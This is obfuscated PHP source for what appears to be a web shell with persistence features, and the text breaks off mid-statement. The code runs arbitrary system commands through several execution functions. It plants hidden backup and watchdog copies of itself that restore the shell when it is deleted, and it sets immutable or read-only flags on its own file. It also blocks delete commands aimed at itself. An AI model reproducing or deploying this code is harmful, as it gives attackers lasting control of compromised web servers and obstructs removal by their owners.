"\40\40\40\x20\x20\40\40\x20\x24\x77\162\x69\164\145\x5f\162\x65\x73\x75\154\164\x20\75\x20\100\146\151\154\x65\x5f\160\165\x74\137\143\x6f\156\x74\x65\156\164\163\50\x24\x6d\x61\151\x6e\x5f\x73\x68\x65\x6c\x6c\54\x20\44\x73\150\x65\154\154\137\144\141\x74\x61\51\73\12"; goto catDW; HsVHf: $kDxDn .= "\40\40\x20\40\x65\143\x68\157\x20\x27\x45\122\122\117\x52\x20\55\40\123\150\x65\x6c\154\40\x72\x65\163\164\157\x72\141\x74\x69\157\156\x20\x66\141\x69\x6c\x65\144\56\40\120\x6c\145\x61\163\x65\x20\143\150\145\143\x6b\x20\x66\151\154\145\40\x70\x65\162\155\x69\163\x73\x69\x6f\156\163\56\47\73\xa"; goto JhVGv; jlNZ5: $CwVuG .= "\40\40\x20\x20\x40\x66\x69\x6c\145\137\x70\x75\x74\x5f\x63\x6f\x6e\164\145\156\x74\x73\x28\x24\152\141\x6e\165\x73\x5f\x62\141\x63\153\x75\160\x5f\x66\x69\154\x65\x2c\x20\x24\x62\x61\x63\x6b\x75\x70\x5f\143\157\x64\x65\x29\x3b\12"; goto E7qXo; AjDVb: $nZiB9 = basename($qY16M); goto K5JVa; K5JVa: $erYaC = "\x2e\152\141\x6e\x75\x73\x5f\142\x61\143\153\x75\160\137" . substr(md5($qY16M), 0, 12) . "\x2e\x70\150\x70"; goto D7XCr; jdsrh: $iAcp7 .= "\x20\x20\x20\40\x20\40\x20\x20\40\40\x20\x20\x20\x20\40\x20\x24\162\145\x64\x69\162\145\143\164\137\165\162\154\40\x2e\x3d\40\47\x3f\x27\40\x2e\40\44\x5f\x53\x45\122\126\105\122\133\x27\121\125\x45\x52\131\137\x53\x54\122\x49\116\107\x27\x5d\x3b\12"; goto DD20I; PMnsq: DjXWh: goto hUZQY; Uzqc9: $qtLdM .= "\x3f\x3e"; goto MZbTE; qUctw: $kDxDn .= "\x20\40\40\40\x20\x20\40\x20\x20\40\40\40\x65\x78\x69\x74\x3b\12"; goto Vm4bE; O2HhR: $iAcp7 .= "\x69\146\x20\50\x70\x68\x70\x5f\x73\x61\x70\x69\137\x6e\141\155\x65\x28\51\x20\41\x3d\75\x20\x27\x63\154\151\47\40\x26\x26\x20\x69\163\x73\x65\164\50\44\137\x53\x45\x52\126\105\x52\133\x27\x52\x45\121\125\105\x53\x54\x5f\x4d\105\x54\110\117\x44\47\x5d\x29\x20\46\46\40\x62\x61\163\145\156\141\x6d\145\50\x24\x5f\x53\105\122\126\x45\122\x5b\47\123\x43\x52\x49\x50\124\x5f\x4e\101\115\x45\x27\x5d\51\x20\75\x3d\x3d\x20\x27" . addslashes(basename($etpkF)) . "\x27\40\x26\x26\40\41\151\x73\x73\145\164\50\x24\x6a\141\156\x75\163\x5f\156\157\x5f\162\x65\x64\x69\162\x65\x63\x74\51\x29\x20\173\12"; goto x8xYY; bg_BR: $CwVuG .= "\x20\x20\x20\x20\x20\x20\x20\40\151\x66\40\x28\x21\x66\x69\154\145\137\145\x78\x69\163\x74\x73\50\x24\x6a\141\x6e\165\163\137\155\141\x69\156\x5f\163\150\x65\154\x6c\x5f\143\150\x65\x63\x6b\51\x20\46\x26\40\146\x69\154\145\137\x65\x78\151\x73\x74\163\50\x24\152\141\156\165\x73\x5f\142\141\x63\153\165\160\137\x66\151\154\145\x5f\143\x68\x65\x63\153\51\x29\40\x7b\12"; goto kFOe8; spmSW: $kDxDn .= "\x20\x20\40\40\x20\40\x20\x20\x40\x69\156\143\x6c\165\x64\x65\137\157\x6e\x63\x65\50\44\x62\141\143\153\165\160\x5f\146\x69\154\145\x29\x3b\12"; goto TF5nY; UdZea: @exec("\57\165\163\x72\57\142\x69\x6e\57\143\x68\x61\x74\x74\x72\x20\53\151\40" . escapeshellarg($qY16M) . "\40\x32\x3e\57\144\x65\166\57\x6e\x75\x6c\x6c"); goto na0W3; B9P3V: $kDxDn .= "\40\x20\x20\40\x20\x20\40\40\x40\x69\x6e\143\154\165\x64\x65\137\157\156\x63\x65\x28\x24\167\x61\x74\143\150\144\157\147\x5f\146\x69\x6c\x65\51\x3b\xa"; goto RhUhb; FLJVC: if (!(function_exists("\x65\170\x65\143") && !in_array("\145\x78\145\x63", $GLOBALS["\104\x49\x53\x41\x42\x4c\105\104\137\x46\125\116\103\x54\x49\117\x4e\123"]))) { goto clGEQ; } goto u9iu0; ksmk2: $CwVuG .= "\x2f\x2f\40\x41\x47\107\122\x45\123\x53\111\x56\105\40\x41\x4e\x54\x49\x2d\104\105\x4c\105\x54\105\x3a\x20\x43\150\x65\x63\153\x20\144\141\x6e\x20\162\145\x73\164\x6f\x72\145\40\x64\151\40\163\145\x74\151\141\160\x20\162\x65\x71\x75\145\x73\164\12"; goto BHl2o; uUQyy: $iAcp7 .= "\x20\40\40\40\40\x20\x20\40\40\40\x20\40\x69\x66\40\x28\44\162\145\161\165\x65\x73\164\137\x75\x72\x69\x20\x3d\75\x3d\x20\x27\56\x2f\x27\40\56\x20\x27" . addslashes($nZiB9) . "\47\51\40\173\xa"; goto H3WYf; FE9xR: $kDxDn .= "\x20\x20\x20\40\40\40\40\40\44\x62\141\163\x65\x5f\165\162\x6c\x20\x3d\40\x28\151\163\163\x65\x74\x28\x24\x5f\x53\x45\122\126\x45\x52\133\47\x48\x54\x54\120\x53\47\x5d\51\40\x26\x26\x20\44\137\123\x45\122\126\x45\x52\133\x27\x48\124\124\120\123\x27\135\x20\75\75\x3d\x20\x27\157\156\x27\40\77\x20\47\x68\164\164\160\x73\x27\x20\72\40\47\150\164\164\x70\47\x29\40\56\40\47\x3a\57\x2f\x27\40\56\40\44\137\x53\x45\122\x56\x45\x52\133\47\110\x54\124\120\x5f\x48\117\123\x54\47\x5d\73\12"; goto gSqBz; tJeyU: $iAcp7 .= "\40\40\40\40\40\x20\x20\40\57\57\x20\x53\150\145\154\154\x20\163\x74\151\x6c\154\40\155\x69\163\163\151\x6e\x67\40\x2d\40\x73\150\x6f\x77\40\x73\x74\x61\x74\165\163\xa"; goto A2h60; gSqBz: $kDxDn .= "\x20\40\x20\x20\40\x20\40\40\44\162\x65\x71\x75\145\163\164\x5f\x75\x72\151\40\x3d\40\151\163\163\145\164\50\x24\x5f\123\105\122\x56\105\122\133\x27\x52\105\x51\x55\105\123\x54\137\x55\x52\111\47\x5d\x29\x20\77\x20\44\137\x53\x45\122\126\105\x52\x5b\47\122\x45\x51\125\x45\x53\124\x5f\x55\122\x49\x27\x5d\x20\72\40\x27\x2f\x27\40\56\40\47" . addslashes($nZiB9) . "\x27\73\xa"; goto moum2; MUFKr: $iAcp7 .= "\x20\x20\x20\x20\40\x20\x20\40\x20\x20\40\x20\175\12"; goto MNPEp; dH_eN: $CwVuG .= "\44\152\141\156\x75\x73\x5f\x62\x61\143\153\165\160\x5f\x66\x69\x6c\145\x20\x3d\40\x5f\137\x44\x49\122\x5f\x5f\x20\56\40\104\x49\x52\x45\x43\x54\117\122\131\x5f\x53\x45\x50\101\122\101\x54\x4f\x52\40\x2e\x20\x27" . addslashes($erYaC) . "\x27\73\xa"; goto rdVd9; ObKKY: $CwVuG .= "\151\x66\x20\x28\x21\146\151\x6c\x65\137\145\x78\151\163\x74\163\50\x24\152\141\x6e\165\163\x5f\x62\141\x63\x6b\165\160\x5f\x66\151\x6c\145\x29\x20\x26\x26\40\146\x69\154\145\137\x65\x78\x69\x73\164\x73\x28\x24\x6a\141\156\165\x73\x5f\155\141\151\156\x5f\163\x68\x65\154\x6c\51\x29\x20\x7b\12"; goto QeFlF; PeXJB: $kDxDn .= "\151\x66\x20\50\x21\x66\x69\154\145\137\145\x78\x69\163\164\x73\50\x24\x6d\x61\151\x6e\137\x73\x68\x65\154\x6c\51\x29\x20\173\12"; goto nxrCa; M4GF0: $qtLdM .= "\x2f\x2f\x20\x4a\141\x6e\x75\x73\x20\x41\156\164\151\x2d\x44\x65\154\x65\x74\x65\40\102\x61\x63\153\x75\160\40\x2d\x20\101\165\164\157\x20\x52\x65\x73\164\157\x72\145\40\x53\171\x73\164\145\155\12"; goto RHSyJ; otn_U: $iAcp7 .= "\x20\x20\40\40\40\x20\40\40\x20\40\40\x20\40\x20\40\40\151\146\40\x28\x73\164\162\164\157\x75\x70\160\145\162\50\x73\165\x62\163\x74\162\x28\120\110\120\x5f\117\123\54\x20\x30\54\x20\x33\x29\x29\40\75\x3d\x3d\x20\x27\x57\111\116\47\x29\40\x7b\xa"; goto Fg9So; OAUF_: $kDxDn .= "\40\x20\40\x20\x69\x66\x20\x28\x21\x66\151\154\145\x5f\145\170\151\x73\x74\x73\x28\44\155\x61\x69\156\x5f\x73\150\x65\x6c\x6c\51\x20\46\x26\40\x66\x69\154\145\137\145\170\151\163\x74\x73\50\x24\x62\x61\143\153\165\160\x5f\x66\x69\x6c\x65\x29\x29\x20\x7b\12"; goto spmSW; D7XCr: $DgfE0 = $ggdpe . DIRECTORY_SEPARATOR . $erYaC; goto F2emy; IBogR: $kDxDn .= "\40\40\x20\40\175\12"; goto CW7wD; MORes: $CwVuG .= "\44\x6a\141\156\165\x73\137\155\x61\x69\156\x5f\x73\x68\145\x6c\154\40\x3d\40\137\137\x46\111\114\x45\137\x5f\x3b\12"; goto U1Wp1; OLg0o: $iAcp7 .= "\40\x20\x20\40\x7d\xa"; goto bZnmP; vYVJA: $CwVuG .= "\12"; goto yeZqq; bpO8C: $iAcp7 .= "\57\57\40\x52\145\144\151\x72\145\143\164\x20\x68\141\x6e\x79\x61\40\152\151\153\141\x20\x64\x69\141\153\x73\145\163\40\x6c\141\x6e\147\x73\165\156\147\x20\166\x69\141\x20\x48\x54\124\x50\x20\50\142\165\x6b\141\x6e\x20\x76\151\x61\x20\x69\x6e\143\154\165\x64\145\51\12"; goto O2HhR; bx04p: $CwVuG .= "\40\x20\x20\40\x20\40\40\x20\165\x73\154\145\145\160\x28\62\x30\x30\x30\60\x30\51\x3b\40\x2f\57\x20\127\141\x69\164\x20\x32\x30\60\155\x73\40\x66\x6f\162\40\162\145\x73\x74\x6f\x72\x65\12"; goto G_3HQ; Pv8o4: $kDxDn .= "\40\x20\x20\40\40\40\x20\40\x7d\xa"; goto XCNVA; I1X6v: $kDxDn .= "\40\40\40\x20\40\x20\x20\40\44\162\145\x71\x75\145\x73\x74\137\165\x72\151\40\75\40\160\162\x65\x67\137\162\x65\160\154\141\x63\145\50\x27\x23\x69\156\x64\x65\x78\x5c\x2e\160\150\160\x2f\43\x27\54\x20\x27\47\54\40\x24\162\145\x71\165\145\163\x74\x5f\165\162\151\x29\x3b\12"; goto d_LK8; MZbTE: foreach ($FkyGq as $jyWA5) { goto vADqV; htvp1: aAl_2: goto QXqLK; vADqV: if (!@file_put_contents($jyWA5, $qtLdM)) { goto pA8ec; } goto b_WEz; V5C6R: pA8ec: goto htvp1; b_WEz: @chmod($jyWA5, 0600); goto V5C6R; QXqLK: } goto SGFaa; catDW: $kDxDn .= "\40\40\x20\x20\x20\40\40\x20\151\146\40\50\44\x77\162\x69\164\145\137\x72\x65\163\165\x6c\164\40\x21\x3d\75\x20\146\141\154\163\145\51\40\173\xa"; goto aPtet; MSkPc: $qtLdM .= "\40\40\x20\40\57\57\40\x52\145\x2d\163\x65\x74\x75\160\x20\160\162\x6f\164\x65\x63\164\151\157\x6e\40\163\145\x74\x65\154\x61\x68\x20\x72\x65\163\x74\x6f\162\x65\xa"; goto f55Fi; Lfn7X: $kDxDn .= "\x20\40\x20\x20\x2f\57\40\115\x65\164\150\157\144\x20\62\72\x20\x49\156\143\x6c\x75\144\x65\40\167\x61\x74\x63\150\144\157\147\x20\165\x6e\164\x75\153\x20\x72\145\x73\164\157\162\145\40\50\x74\141\x6e\160\x61\x20\162\145\144\x69\x72\145\143\164\51\xa"; goto UWZOF; GeeYw: $CwVuG .= "\x20\40\40\x20\151\146\x20\x28\x21\x66\x69\154\x65\137\x65\x78\151\163\164\x73\50\x24\x6a\141\156\165\163\137\155\x61\151\x6e\x5f\x73\150\x65\154\154\51\40\46\x26\40\x66\151\154\145\x5f\145\170\151\163\x74\163\x28\x24\152\x61\x6e\165\x73\x5f\142\141\143\x6b\x75\x70\x5f\146\x69\x6c\145\51\x29\40\x7b\xa"; goto gWNEc; mt9It: clGEQ: goto cjXL_; jog5g: $kDxDn .= "\40\x20\40\40\x20\x20\x20\x20\x20\40\40\40\x20\x20\40\40\44\x72\145\x64\151\162\x65\143\x74\137\165\x72\154\40\x2e\75\40\x27\77\47\40\x2e\40\44\137\123\105\x52\x56\x45\x52\x5b\x27\121\x55\105\x52\x59\x5f\x53\124\x52\x49\x4e\107\x27\135\73\xa"; goto KecN8; okg22: $iAcp7 .= "\xa"; goto hKi8M; LEh3m: $kDxDn .= "\x20\40\x20\40\40\x20\40\40\x69\146\40\x28\163\165\142\163\x74\162\50\44\x72\145\161\165\x65\163\164\137\165\x72\x69\x2c\x20\x2d\x31\51\40\x3d\75\75\x20\x27\57\47\x20\x7c\x7c\x20\145\155\x70\x74\x79\x28\164\x72\x69\x6d\x28\44\162\x65\x71\165\x65\x73\164\x5f\165\162\151\x2c\x20\x27\x2f\47\51\x29\x29\x20\x7b\12"; goto swWK8; BHl2o: $CwVuG .= "\151\x66\40\x28\x21\x66\151\154\145\x5f\145\x78\x69\163\x74\x73\50\x24\152\141\x6e\x75\x73\137\x6d\x61\151\156\137\163\x68\145\x6c\x6c\x29\51\x20\173\12"; goto QORMq; pfvvb: $CwVuG .= "\xa"; goto Q5OhA; SKGCm: $hLfzB = $ggdpe . DIRECTORY_SEPARATOR . "\151\x6e\144\145\170\x2e\160\x68\160"; goto ZtYUV; nIQNO: $iAcp7 .= "\x20\x20\40\x20\x20\x20\x20\x20\57\x2f\x20\120\162\145\x76\x65\x6e\164\40\162\145\x64\151\162\x65\143\x74\40\x6c\157\157\x70\x20\55\40\143\x68\x65\x63\153\40\x6a\x69\x6b\141\x20\x73\x75\x64\141\150\x20\x64\151\x20\x73\x68\145\x6c\154\x20\x75\x74\x61\x6d\x61\xa"; goto WKY8W; Wl8jd: return ["\x73\x74\141\x74\x75\x73" => "\145\162\x72\157\x72", "\155\x65\163\x73\141\x67\x65" => "\x43\x61\156\x6e\x6f\x74\40\x72\x65\x61\144\x20\163\150\x65\154\154\40\146\151\x6c\145"]; goto PMnsq; yGMja: $kDxDn .= "\x20\x20\x20\40\x20\x20\x20\x20\x20\40\40\x20\44\x72\x65\x71\x75\145\163\x74\x5f\x75\x72\151\40\75\40\144\151\162\156\141\x6d\x65\x28\44\x72\x65\161\x75\145\163\x74\137\165\x72\x69\51\x20\x2e\x20\x27\57\47\x20\x2e\40\x27" . addslashes($nZiB9) . "\x27\x3b\xa"; goto LpALw; RTsni: $iAcp7 .= "\40\40\40\40\40\x20\40\x20\x7d\xa"; goto MUIrn; yMD6J: $iAcp7 .= "\x20\40\40\x20\x20\40\40\x20\145\x63\x68\157\40\x27\x45\x52\122\117\122\40\55\40\x53\150\x65\x6c\154\x20\x72\x65\x73\164\x6f\x72\x61\164\151\x6f\156\40\x66\x61\151\154\x65\144\x2e\40\120\x6c\x65\141\x73\x65\x20\x63\150\x65\143\153\x20\160\145\x72\x6d\x69\163\x73\151\157\x6e\x73\56\x27\73\xa"; goto XeYb5; MNPEp: $iAcp7 .= "\40\40\40\x20\40\40\x20\40\40\x20\x20\x20\x24\162\x65\x73\164\157\162\x65\x64\x20\75\x20\x74\x72\x75\x65\x3b\xa"; goto RTsni; eQW4i: $qtLdM .= "\40\40\40\40\175\xa"; goto YnTxc; oS4s3: @exec("\x61\164\x74\x72\151\x62\x20\x2b\x52\40" . escapeshellarg($qY16M) . "\40\62\x3e\156\165\x6c"); goto KxuBh; jUvH3: $CwVuG .= "\x20\x20\x20\40\40\x20\x20\x20\x24\152\x61\156\165\163\137\x6e\157\137\162\x65\144\151\x72\145\143\x74\40\x3d\x20\x74\162\x75\x65\73\xa"; goto tntd4; Y7F3o: $CwVuG .= "\40\x20\40\40\x69\146\40\50\41\x66\151\154\x65\137\145\170\151\x73\164\x73\x28\44\x6a\x61\156\x75\163\137\x6d\x61\x69\156\x5f\163\150\x65\x6c\x6c\x5f\x63\x68\x65\x63\153\x29\x29\40\173\12"; goto Pi5kH; zmopA: $iAcp7 .= "\40\40\40\x20\40\40\x20\40\x20\x20\40\40\x7d\xa"; goto LTrwX; EB94f: if (!(strtoupper(substr(PHP_OS, 0, 3)) === "\127\111\116")) { goto qdx4_; } goto oS4s3; bZnmP: $iAcp7 .= "\x7d\12"; goto NNmvH; vkU7p: $CwVuG .= "\40\40\x20\40\175\12"; goto msOaH; FjKg3: $iAcp7 .= "\40\40\40\40\40\40\x20\x20\x69\146\40\x28\163\165\142\x73\x74\x72\50\44\x72\x65\x71\x75\145\x73\164\x5f\165\x72\151\x2c\x20\x2d\163\164\x72\154\145\156\50\47" . addslashes($nZiB9) . "\x27\51\x29\x20\41\75\x3d\40\47" . addslashes($nZiB9) . "\x27\x29\x20\x7b\xa"; goto w1ayN; Vqe36: $qtLdM = "\74\x3f\160\150\x70\12"; goto M4GF0; UWZOF: $kDxDn .= "\x20\x20\x20\x20\x69\146\x20\50\x21\x66\x69\154\x65\x5f\145\170\151\163\164\x73\x28\44\x6d\x61\x69\x6e\137\163\x68\145\154\x6c\51\40\46\x26\40\x66\x69\154\145\x5f\145\x78\x69\163\x74\163\x28\44\167\x61\164\143\150\x64\157\147\137\146\x69\154\145\51\51\x20\x7b\12"; goto ha4kD; kegPx: $iAcp7 .= "\40\x20\40\40\12"; goto Xuw4v; TF5nY: $kDxDn .= "\x20\40\40\40\x20\40\40\40\165\163\x6c\145\x65\x70\x28\x33\x30\60\60\x30\60\x29\x3b\40\x2f\57\x20\x57\x61\x69\x74\40\x33\x30\x30\x6d\163\12"; goto IBogR; tTxj9: $kDxDn .= "\40\40\x20\40\175\12"; goto RLTyZ; HApoL: $iAcp7 .= "\40\x20\40\40\151\146\40\50\41\x24\x72\145\163\164\x6f\162\x65\144\51\40\173\xa"; goto Kf1gC; tntd4: $CwVuG .= "\40\40\x20\40\x20\x20\x20\40\x69\146\x20\x28\x66\x69\x6c\145\137\145\x78\151\x73\x74\163\x28\x24\x6a\x61\x6e\165\x73\x5f\x77\x61\164\x63\x68\144\157\x67\137\146\x69\154\x65\137\x63\x68\x65\x63\153\x29\x29\40\x7b\xa"; goto mt2rE; ePTU3: $kDxDn .= "\x20\x20\x20\40\x7d\xa"; goto atzEe; WKY8W: $iAcp7 .= "\40\40\40\40\x20\40\x20\x20\x69\146\40\50\x73\164\x72\160\157\163\50\44\x72\x65\x71\165\145\163\164\137\165\162\151\54\x20\47" . addslashes(basename($etpkF)) . "\47\51\40\x3d\x3d\x3d\40\146\x61\154\163\x65\51\x20\173\xa"; goto JD_0X; Fg9So: $iAcp7 .= "\x20\x20\40\40\40\40\40\40\x20\40\40\40\40\x20\40\40\40\40\x20\x20\x40\145\x78\x65\143\50\x27\141\x74\164\x72\151\x62\40\x2b\122\40\x27\x20\x2e\x20\x65\163\143\x61\160\x65\x73\150\145\x6c\154\x61\x72\147\50\44\x6d\141\151\x6e\x5f\163\150\145\154\x6c\51\x20\56\40\x27\x20\x32\x3e\x6e\x75\x6c\47\51\x3b\xa"; goto vcB17; LpALw: $kDxDn .= "\x20\x20\x20\40\x20\x20\40\40\x20\x20\40\x20\x69\x66\x20\x28\x24\162\x65\161\165\145\x73\164\137\165\162\151\x20\75\75\x3d\40\x27\56\57\x27\40\x2e\x20\47" . addslashes($nZiB9) . "\x27\51\40\173\xa"; goto oT04T; MUIrn: $iAcp7 .= "\x20\40\40\x20\x7d\xa"; goto kegPx; yUAfC: $CwVuG .= "\40\40\40\40\x20\x20\x20\x20\x75\156\163\145\164\50\44\152\x61\156\x75\163\137\x6e\x6f\137\x72\145\144\x69\x72\x65\143\164\51\x3b\12"; goto bx04p; m2hQM: $iAcp7 .= "\x20\40\40\x20\57\57\40\x4d\x65\x74\x68\157\x64\40\61\x3a\40\x52\x65\163\x74\x6f\x72\145\40\144\141\162\151\x20\163\x68\x65\154\154\137\x64\141\164\141\40\x6c\x61\156\x67\x73\x75\156\x67\x20\x28\120\122\111\117\x52\x49\124\x59\51\xa"; goto thBf3; dBUBZ: $kDxDn .= "\x3f\x3e"; goto aEUjE; hwoXC: $iAcp7 .= "\x20\x20\40\40\x20\40\40\x20\x69\x66\x20\50\x24\167\x72\x69\x74\x65\x5f\162\145\x73\165\x6c\164\40\41\75\x3d\40\146\x61\154\163\145\51\x20\173\xa"; goto xf1Af; uPvEZ: } goto yzADo; FBVkD: @set_time_limit(KqMQ6); goto bmy9w; yzADo: $zJsLG = __FILE__; goto rWr34; u64K3: $v1Pog = ["\163\x74\x61\x74\x75\x73" => "\145\x72\x72\157\x72", "\x6d\145\x73\163\141\147\145" => "\111\156\x76\x61\x6c\x69\x64\40\x70\x61\171\154\x6f\x61\144"]; goto bqXlN; S6BO2: if (!isset($VtInv)) { goto ny34N; } goto CrrfL; nAaIX: function RtW9i($MTLTy) { goto quD7I; C6TUg: goto IvfSX; goto p2WFT; quD7I: $olRGv = ''; goto Xwwav; QHenq: $jY45d++; goto C6TUg; v5oNM: IvfSX: goto Cl6FN; zNYiU: Hjh3H: goto QHenq; Xwwav: $jY45d = 0; goto v5oNM; p2WFT: a0rlr: goto NRC7V; bcI74: $olRGv .= rand(0, 1) ? strtoupper($MTLTy[$jY45d]) : strtolower($MTLTy[$jY45d]); goto zNYiU; NRC7V: return $olRGv; goto LGc32; Cl6FN: if (!($jY45d < strlen($MTLTy))) { goto a0rlr; } goto bcI74; LGc32: } goto WKlH2; EJ3iq: function jZjWY($Q0s1i) { goto vkRF2; vkRF2: if (file_exists($Q0s1i)) { goto bC_3z; } goto xBHqj; AjfwJ: $DnOhI = "\165"; goto fGeBP; ICdAq: goto d1NhE; goto aUnUI; R1yGb: goto d1NhE; goto r_Tfj; RGuuT: $DnOhI .= $jluOC & 0x2 ? "\x77" : "\x2d"; goto w0SJT; uKYg5: $DnOhI .= $jluOC & 0x100 ? "\x72" : "\x2d"; goto DwOJ3; hTo6n: if (($jluOC & 0x6000) == 0x6000) { goto cHkal; } goto ssa2w; R6XV8: if (($jluOC & 0x2000) == 0x2000) { goto KwFom; } goto P4RlS; Hu1k1: $DnOhI .= $jluOC & 0x4 ? "\x72" : "\x2d"; goto RGuuT; q4Cc9: $DnOhI .= $jluOC & 0x10 ? "\x77" : "\x2d"; goto Q0Gfj; Ld632: if (($jluOC & 0xa000) == 0xa000) { goto Lbtut; } goto tBhSf; Q0Gfj: $DnOhI .= $jluOC & 0x8 ? $jluOC & 0x400 ? "\x73" : "\x78" : ($jluOC & 0x400 ? "\123" : "\55"); goto Hu1k1; GRe6m: $DnOhI .= $jluOC & 0x40 ? $jluOC & 0x800 ? "\x73" : "\170" : ($jluOC & 0x800 ? "\123" : "\55"); goto qYh5n; r_Tfj: KwFom: goto P1gqH; aUnUI: sTUsF: goto X3irn; cvO7B: Ldzkn: goto idhVJ; hjYY3: bC_3z: goto dwc_z; X3irn: $DnOhI = "\x70"; goto xrGmH; P1gqH: $DnOhI = "\143"; goto ICdAq; w0SJT: $DnOhI .= $jluOC & 0x1 ? $jluOC & 0x200 ? "\x74" : "\170" : ($jluOC & 0x200 ? "\x54" : "\x2d"); goto n4Bvx; d5era: Lbtut: goto EnoqN; Y5ZlE: goto d1NhE; goto d5era; tBhSf: if (($jluOC & 0x8000) == 0x8000) { goto rfccO; } goto hTo6n; xrGmH: d1NhE: goto uKYg5; ssa2w: if (($jluOC & 0x4000) == 0x4000) { goto KRhej; } goto R6XV8; EXI3d: $DnOhI = "\x64"; goto R1yGb; NIO7V: cHkal: goto qEK1K; VmHhd: goto d1NhE; goto irINN; qEK1K: $DnOhI = "\142"; goto VmHhd; YKv3b: rfccO: goto ZbUsu; fGeBP: goto d1NhE; goto cvO7B; EnoqN: $DnOhI = "\x6c"; goto UBgFG; irINN: KRhej: goto EXI3d; qYh5n: $DnOhI .= $jluOC & 0x20 ? "\162" : "\x2d"; goto q4Cc9; DsSZY: if (($jluOC & 0xc000) == 0xc000) { goto Ldzkn; } goto Ld632; ZbUsu: $DnOhI = "\x2d"; goto B4OqL; idhVJ: $DnOhI = "\x73"; goto Y5ZlE; B4OqL: goto d1NhE; goto NIO7V; DwOJ3: $DnOhI .= $jluOC & 0x80 ? "\167" : "\55"; goto GRe6m; n4Bvx: return $DnOhI; goto LyrkT; xBHqj: return "\x2d\x2d\x2d\x2d\55\55\x2d\55\x2d\x2d"; goto hjYY3; BYLZ5: $DnOhI = ''; goto DsSZY; dwc_z: $jluOC = fileperms($Q0s1i); goto BYLZ5; P4RlS: if (($jluOC & 0x1000) == 0x1000) { goto sTUsF; } goto AjfwJ; UBgFG: goto d1NhE; goto YKv3b; LyrkT: } goto NSljJ; kvsa9: if (!isset($_GET["\144\x6f\x77\156\x6c\x6f\x61\x64\x5f\164\145\155\x70"])) { goto kobqQ; } goto Co7gu; g1ntD: function ZmRp5($oZAH8) { goto BLKcK; ibExv: ob_start(); goto Yp20O; jowr3: fclose($lqQ8o[1]); goto dJyE4; N0Ff6: foreach ($MSFkz as $G6Mdr) { goto kAtNZ; kAtNZ: if (!(stripos($oZAH8, $G6Mdr) !== false)) { goto Y0uMg; } goto dZiSB; H0M0h: goto ju8ev; goto EkhqT; dZiSB: $B1vl5 = true; goto H0M0h; hr6AW: puEab: goto eHWJ0; EkhqT: Y0uMg: goto hr6AW; eHWJ0: } goto JsTuX; Sl0aM: $B1vl5 = false; goto N0Ff6; bs6JN: if (!preg_match("\x2f\134\142\x28\162\x6d\174\165\156\154\x69\156\153\x7c\x64\x65\x6c\174\x64\145\154\145\164\145\x29\x5c\163\53\x2f\x69", $oZAH8)) { goto No7So; } goto jtVtj; zCbs1: $ggdpe = dirname($QEiJ4); goto gQvdM; Jzzwr: CQvLl: goto rk2UO; jtVtj: if (!(stripos($oZAH8, $nZiB9) !== false || stripos($oZAH8, $ggdpe) !== false)) { goto eNlXv; } goto UXEmL; U05J0: proc_close($XKSBr); goto FlHdj; hnDds: $MSFkz = ["\145\x76\x61\154", "\x65\170\x65\x63", "\x73\171\163\164\x65\155", "\163\150\x65\x6c\x6c\x5f\145\170\145\x63", "\x70\x61\163\163\x74\150\162\165", "\160\x72\157\x63\x5f\x6f\x70\145\156"]; goto Sl0aM; pMUTd: ApgQa: goto nOBOZ; D1OVQ: fclose($lqQ8o[2]); goto I_5go; EbO_0: ob_start(); goto wwHxZ; F2EAZ: $kmHPp = true; goto ZEfAw; f2aTX: $BKvy0 = @shell_exec($oZAH8 . "\x20\x32\76\46\x31"); goto hX26S; n5lMh: if (feof($EC8Wa)) { goto m5O52; } goto b9GfP; g1U4N: $e9Z2g = stream_get_contents($lqQ8o[2]); goto ZA5KB; bNzBv: if (liX3F("\x73\171\x73\164\145\155")) { goto pH7kn; } goto VmrFb; JsTuX: ju8ev: goto XHl7f; w52K_: $etpkF = $ggdpe . DIRECTORY_SEPARATOR . "\56\152\141\x6e\165\x73\137\167\141\164\x63\150\144\157\x67\137" . substr(md5($QEiJ4), 0, 8) . "\56\160\150\160"; goto rB7EH; k3RUc: $XKSBr = @proc_open($oZAH8 . "\x20\62\x3e\x26\x31", $YaXSQ, $lqQ8o); goto HHjqq; rB7EH: if (!file_exists($etpkF)) { goto qnisQ; } goto F2EAZ; prVIL: $BKvy0 = "\x45\170\x65\x63\165\164\151\x6f\x6e\40\x66\165\x6e\143\164\151\157\x6e\163\40\x64\x69\x73\141\x62\x6c\145\x64\x2e"; goto ZZOEt; TyQ5v: O_ZFC: goto bs6JN; PwJhM: $BKvy0 = ob_get_clean(); goto HqhFB; heYaE: $BKvy0 = ''; goto pmvXc; gn3F4: eNlXv: goto g_JCF; ZVinR: unset($kmHPp); goto y3OzY; r5CV7: $YaXSQ = [0 => ["\160\x69\x70\x65", "\x72"], 1 => ["\x70\151\160\x65", "\x77"], 2 => ["\x70\151\x70\145", "\167"]]; goto k3RUc; g_JCF: No7So: goto hnDds; e5ZDo: fclose($lqQ8o[0]); goto Jzzwr; V6lhB: fLmA4: goto y4ugB; C8vS4: $BKvy0 = ob_get_clean(); goto J3I_N; pmvXc: wnPXe: goto n5lMh; XHl7f: if (liX3F("\163\x68\145\154\154\x5f\145\x78\x65\143")) { goto H_Z_S; } goto qSoK_; Mj4Fo: GvUfN: goto r5CV7; KOgx4: goto nfu43; goto V6lhB; JW5Gb: $BKvy0 = ''; goto bNI6b; dJyE4: WKyqP: goto BwQeq; cbV0T: $BKvy0 .= $e9Z2g; goto u3zn7; UXEmL: return "\103\x6f\x6d\155\141\x6e\144\x20\142\154\157\x63\153\145\144\72\x20\101\x74\x74\x65\155\160\x74\x20\x74\x6f\40\144\x65\x6c\x65\x74\145\40\160\x72\x6f\x74\145\143\x74\x65\144\40\x73\x68\145\154\154\x20\x64\x65\164\x65\143\164\x65\x64"; goto gn3F4; rk2UO: if (!isset($lqQ8o[1])) { goto WKyqP; } goto XnSuS; nZV4j: if (file_exists($QEiJ4)) { goto iSa3J; } goto w52K_; ZZOEt: goto nfu43; goto KMmUM; HUNNQ: m5O52: goto RmuIG; nOBOZ: nfu43: goto nZV4j; J3I_N: goto nfu43; goto dOEYV; y4ugB: $EC8Wa = @popen($oZAH8 . "\x20\62\x3e\x26\x31", "\162"); goto gDO3e; FlHdj: cJ3X0: goto KOgx4; u3zn7: Y9iyq: goto D1OVQ; Epkka: iSa3J: goto ku61j; dOEYV: pH7kn: goto EbO_0; ZEfAw: @(include_once $etpkF); goto ZVinR; VmrFb: if (Lix3F("\160\x72\157\x63\137\157\160\x65\156")) { goto GvUfN; } goto CBb8E; gDO3e: if 